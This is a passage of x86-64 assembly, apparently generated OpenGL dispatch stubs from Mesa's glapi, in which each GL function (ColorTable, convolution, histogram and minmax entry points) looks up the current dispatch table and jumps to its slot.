call _glapi_get_dispatch
popq %rdi
movq 2696(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(BlendEquation), .-GL_PREFIX(BlendEquation)
.p2align 4,,15
.globl GL_PREFIX(DrawRangeElements)
.type GL_PREFIX(DrawRangeElements), @function
GL_PREFIX(DrawRangeElements):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 2704(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %r8
pushq %r9
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %r9
popq %r8
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 2704(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 2704(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %r8
pushq %r9
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %r9
popq %r8
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 2704(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(DrawRangeElements), .-GL_PREFIX(DrawRangeElements)
.p2align 4,,15
.globl GL_PREFIX(ColorTable)
.type GL_PREFIX(ColorTable), @function
GL_PREFIX(ColorTable):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 2712(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %r8
pushq %r9
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %r9
popq %r8
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 2712(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 2712(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %r8
pushq %r9
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %r9
popq %r8
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 2712(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(ColorTable), .-GL_PREFIX(ColorTable)
.p2align 4,,15
.globl GL_PREFIX(ColorTableParameterfv)
.type GL_PREFIX(ColorTableParameterfv), @function
GL_PREFIX(ColorTableParameterfv):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 2720(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
call _x86_64_get_dispatch@PLT
popq %rdx
popq %rsi
popq %rdi
movq 2720(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 2720(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
call _glapi_get_dispatch
popq %rdx
popq %rsi
popq %rdi
movq 2720(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(ColorTableParameterfv), .-GL_PREFIX(ColorTableParameterfv)
.p2align 4,,15
.globl GL_PREFIX(ColorTableParameteriv)
.type GL_PREFIX(ColorTableParameteriv), @function
GL_PREFIX(ColorTableParameteriv):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 2728(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
call _x86_64_get_dispatch@PLT
popq %rdx
popq %rsi
popq %rdi
movq 2728(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 2728(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
call _glapi_get_dispatch
popq %rdx
popq %rsi
popq %rdi
movq 2728(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(ColorTableParameteriv), .-GL_PREFIX(ColorTableParameteriv)
.p2align 4,,15
.globl GL_PREFIX(CopyColorTable)
.type GL_PREFIX(CopyColorTable), @function
GL_PREFIX(CopyColorTable):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 2736(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %r8
call _x86_64_get_dispatch@PLT
popq %r8
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 2736(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 2736(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %r8
call _glapi_get_dispatch
popq %r8
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 2736(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(CopyColorTable), .-GL_PREFIX(CopyColorTable)
.p2align 4,,15
.globl GL_PREFIX(GetColorTable)
.type GL_PREFIX(GetColorTable), @function
GL_PREFIX(GetColorTable):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 2744(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 2744(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 2744(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 2744(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(GetColorTable), .-GL_PREFIX(GetColorTable)
.p2align 4,,15
.globl GL_PREFIX(GetColorTableParameterfv)
.type GL_PREFIX(GetColorTableParameterfv), @function
GL_PREFIX(GetColorTableParameterfv):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 2752(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
call _x86_64_get_dispatch@PLT
popq %rdx
popq %rsi
popq %rdi
movq 2752(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 2752(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
call _glapi_get_dispatch
popq %rdx
popq %rsi
popq %rdi
movq 2752(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(GetColorTableParameterfv), .-GL_PREFIX(GetColorTableParameterfv)
.p2align 4,,15
.globl GL_PREFIX(GetColorTableParameteriv)
.type GL_PREFIX(GetColorTableParameteriv), @function
GL_PREFIX(GetColorTableParameteriv):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 2760(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
call _x86_64_get_dispatch@PLT
popq %rdx
popq %rsi
popq %rdi
movq 2760(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 2760(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
call _glapi_get_dispatch
popq %rdx
popq %rsi
popq %rdi
movq 2760(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(GetColorTableParameteriv), .-GL_PREFIX(GetColorTableParameteriv)
.p2align 4,,15
.globl GL_PREFIX(ColorSubTable)
.type GL_PREFIX(ColorSubTable), @function
GL_PREFIX(ColorSubTable):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 2768(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %r8
pushq %r9
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %r9
popq %r8
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 2768(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 2768(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %r8
pushq %r9
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %r9
popq %r8
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 2768(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(ColorSubTable), .-GL_PREFIX(ColorSubTable)
.p2align 4,,15
.globl GL_PREFIX(CopyColorSubTable)
.type GL_PREFIX(CopyColorSubTable), @function
GL_PREFIX(CopyColorSubTable):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 2776(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %r8
call _x86_64_get_dispatch@PLT
popq %r8
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 2776(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 2776(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %r8
call _glapi_get_dispatch
popq %r8
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 2776(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(CopyColorSubTable), .-GL_PREFIX(CopyColorSubTable)
.p2align 4,,15
.globl GL_PREFIX(ConvolutionFilter1D)
.type GL_PREFIX(ConvolutionFilter1D), @function
GL_PREFIX(ConvolutionFilter1D):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 2784(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %r8
pushq %r9
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %r9
popq %r8
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 2784(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 2784(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %r8
pushq %r9
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %r9
popq %r8
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 2784(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(ConvolutionFilter1D), .-GL_PREFIX(ConvolutionFilter1D)
.p2align 4,,15
.globl GL_PREFIX(ConvolutionFilter2D)
.type GL_PREFIX(ConvolutionFilter2D), @function
GL_PREFIX(ConvolutionFilter2D):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 2792(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %r8
pushq %r9
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %r9
popq %r8
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 2792(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 2792(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %r8
pushq %r9
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %r9
popq %r8
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 2792(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(ConvolutionFilter2D), .-GL_PREFIX(ConvolutionFilter2D)
.p2align 4,,15
.globl GL_PREFIX(ConvolutionParameterf)
.type GL_PREFIX(ConvolutionParameterf), @function
GL_PREFIX(ConvolutionParameterf):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 2800(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
subq $24, %rsp
movq %rdi, (%rsp)
movq %rsi, 8(%rsp)
movq %xmm0, 16(%rsp)
call _x86_64_get_dispatch@PLT
movq 16(%rsp), %xmm0
movq 8(%rsp), %rsi
movq (%rsp), %rdi
addq $24, %rsp
movq 2800(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 2800(%rax), %r11
jmp *%r11
1:
subq $24, %rsp
movq %rdi, (%rsp)
movq %rsi, 8(%rsp)
movq %xmm0, 16(%rsp)
call _glapi_get_dispatch
movq 16(%rsp), %xmm0
movq 8(%rsp), %rsi
movq (%rsp), %rdi
addq $24, %rsp
movq 2800(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(ConvolutionParameterf), .-GL_PREFIX(ConvolutionParameterf)
.p2align 4,,15
.globl GL_PREFIX(ConvolutionParameterfv)
.type GL_PREFIX(ConvolutionParameterfv), @function
GL_PREFIX(ConvolutionParameterfv):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 2808(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
call _x86_64_get_dispatch@PLT
popq %rdx
popq %rsi
popq %rdi
movq 2808(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 2808(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
call _glapi_get_dispatch
popq %rdx
popq %rsi
popq %rdi
movq 2808(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(ConvolutionParameterfv), .-GL_PREFIX(ConvolutionParameterfv)
.p2align 4,,15
.globl GL_PREFIX(ConvolutionParameteri)
.type GL_PREFIX(ConvolutionParameteri), @function
GL_PREFIX(ConvolutionParameteri):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 2816(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
call _x86_64_get_dispatch@PLT
popq %rdx
popq %rsi
popq %rdi
movq 2816(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 2816(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
call _glapi_get_dispatch
popq %rdx
popq %rsi
popq %rdi
movq 2816(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(ConvolutionParameteri), .-GL_PREFIX(ConvolutionParameteri)
.p2align 4,,15
.globl GL_PREFIX(ConvolutionParameteriv)
.type GL_PREFIX(ConvolutionParameteriv), @function
GL_PREFIX(ConvolutionParameteriv):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 2824(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
call _x86_64_get_dispatch@PLT
popq %rdx
popq %rsi
popq %rdi
movq 2824(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 2824(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
call _glapi_get_dispatch
popq %rdx
popq %rsi
popq %rdi
movq 2824(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(ConvolutionParameteriv), .-GL_PREFIX(ConvolutionParameteriv)
.p2align 4,,15
.globl GL_PREFIX(CopyConvolutionFilter1D)
.type GL_PREFIX(CopyConvolutionFilter1D), @function
GL_PREFIX(CopyConvolutionFilter1D):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 2832(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %r8
call _x86_64_get_dispatch@PLT
popq %r8
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 2832(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 2832(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %r8
call _glapi_get_dispatch
popq %r8
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 2832(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(CopyConvolutionFilter1D), .-GL_PREFIX(CopyConvolutionFilter1D)
.p2align 4,,15
.globl GL_PREFIX(CopyConvolutionFilter2D)
.type GL_PREFIX(CopyConvolutionFilter2D), @function
GL_PREFIX(CopyConvolutionFilter2D):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 2840(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %r8
pushq %r9
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %r9
popq %r8
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 2840(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 2840(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %r8
pushq %r9
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %r9
popq %r8
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 2840(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(CopyConvolutionFilter2D), .-GL_PREFIX(CopyConvolutionFilter2D)
.p2align 4,,15
.globl GL_PREFIX(GetConvolutionFilter)
.type GL_PREFIX(GetConvolutionFilter), @function
GL_PREFIX(GetConvolutionFilter):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 2848(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 2848(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 2848(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 2848(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(GetConvolutionFilter), .-GL_PREFIX(GetConvolutionFilter)
.p2align 4,,15
.globl GL_PREFIX(GetConvolutionParameterfv)
.type GL_PREFIX(GetConvolutionParameterfv), @function
GL_PREFIX(GetConvolutionParameterfv):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 2856(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
call _x86_64_get_dispatch@PLT
popq %rdx
popq %rsi
popq %rdi
movq 2856(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 2856(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
call _glapi_get_dispatch
popq %rdx
popq %rsi
popq %rdi
movq 2856(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(GetConvolutionParameterfv), .-GL_PREFIX(GetConvolutionParameterfv)
.p2align 4,,15
.globl GL_PREFIX(GetConvolutionParameteriv)
.type GL_PREFIX(GetConvolutionParameteriv), @function
GL_PREFIX(GetConvolutionParameteriv):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 2864(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
call _x86_64_get_dispatch@PLT
popq %rdx
popq %rsi
popq %rdi
movq 2864(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 2864(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
call _glapi_get_dispatch
popq %rdx
popq %rsi
popq %rdi
movq 2864(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(GetConvolutionParameteriv), .-GL_PREFIX(GetConvolutionParameteriv)
.p2align 4,,15
.globl GL_PREFIX(GetSeparableFilter)
.type GL_PREFIX(GetSeparableFilter), @function
GL_PREFIX(GetSeparableFilter):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 2872(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %r8
pushq %r9
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %r9
popq %r8
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 2872(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 2872(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %r8
pushq %r9
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %r9
popq %r8
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 2872(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(GetSeparableFilter), .-GL_PREFIX(GetSeparableFilter)
.p2align 4,,15
.globl GL_PREFIX(SeparableFilter2D)
.type GL_PREFIX(SeparableFilter2D), @function
GL_PREFIX(SeparableFilter2D):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 2880(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %r8
pushq %r9
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %r9
popq %r8
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 2880(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 2880(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %r8
pushq %r9
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %r9
popq %r8
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 2880(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(SeparableFilter2D), .-GL_PREFIX(SeparableFilter2D)
.p2align 4,,15
.globl GL_PREFIX(GetHistogram)
.type GL_PREFIX(GetHistogram), @function
GL_PREFIX(GetHistogram):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 2888(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %r8
call _x86_64_get_dispatch@PLT
popq %r8
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 2888(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 2888(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %r8
call _glapi_get_dispatch
popq %r8
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 2888(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(GetHistogram), .-GL_PREFIX(GetHistogram)
.p2align 4,,15
.globl GL_PREFIX(GetHistogramParameterfv)
.type GL_PREFIX(GetHistogramParameterfv), @function
GL_PREFIX(GetHistogramParameterfv):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 2896(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
call _x86_64_get_dispatch@PLT
popq %rdx
popq %rsi
popq %rdi
movq 2896(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 2896(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
call _glapi_get_dispatch
popq %rdx
popq %rsi
popq %rdi
movq 2896(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(GetHistogramParameterfv), .-GL_PREFIX(GetHistogramParameterfv)
.p2align 4,,15
.globl GL_PREFIX(GetHistogramParameteriv)
.type GL_PREFIX(GetHistogramParameteriv), @function
GL_PREFIX(GetHistogramParameteriv):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 2904(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
call _x86_64_get_dispatch@PLT
popq %rdx
popq %rsi
popq %rdi
movq 2904(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 2904(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
call _glapi_get_dispatch
popq %rdx
popq %rsi
popq %rdi
movq 2904(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(GetHistogramParameteriv), .-GL_PREFIX(GetHistogramParameteriv)
.p2align 4,,15
.globl GL_PREFIX(GetMinmax)
.type GL_PREFIX(GetMinmax), @function
GL_PREFIX(GetMinmax):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 2912(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %r8
call _x86_64_get_dispatch@PLT
popq %r8
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 2912(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 2912(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %r8
call _glapi_get_dispatch
popq %r8
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 2912(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(GetMinmax), .-GL_PREFIX(GetMinmax)
.p2align 4,,15
.globl GL_PREFIX(GetMinmaxParameterfv)
.type GL_PREFIX(GetMinmaxParameterfv), @function
GL_PREFIX(GetMinmaxParameterfv):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 2920(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
call _x86_64_get_dispatch@PLT
popq %rdx
popq %rsi
popq %rdi
movq 2920(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 2920(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
call _glapi_get_dispatch
popq %rdx
popq %rsi
popq %rdi
movq 2920(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(GetMinmaxParameterfv), .-GL_PREFIX(GetMinmaxParameterfv)
.p2align 4,,15
.globl GL_PREFIX(GetMinmaxParameteriv)
.type GL_PREFIX(GetMinmaxParameteriv), @function
GL_PREFIX(GetMinmaxParameteriv):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 2928(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
call _x86_64_get_dispatch@PLT
popq %rdx
popq %rsi
popq %rdi
movq 2928(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 2928(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
call _glapi_get_dispatch
popq %rdx
popq %rsi
popq %rdi
movq 2928(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(GetMinmaxParameteriv), .-GL_PREFIX(GetMinmaxParameteriv)
.p2align 4,,15
.globl GL_PREFIX(Histogram)
.type GL_PREFIX(Histogram), @function
GL_PREFIX(Histogram):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 2936(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 2936(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 2936(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 2936(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(Histogram), .-GL_PREFIX(Histogram)
.p2align 4,,15
.globl GL_PREFIX(Minmax)
.type GL_PREFIX(Minmax), @function
GL_PREFIX(Minmax):
#if defined(GLX_USE_TLS)
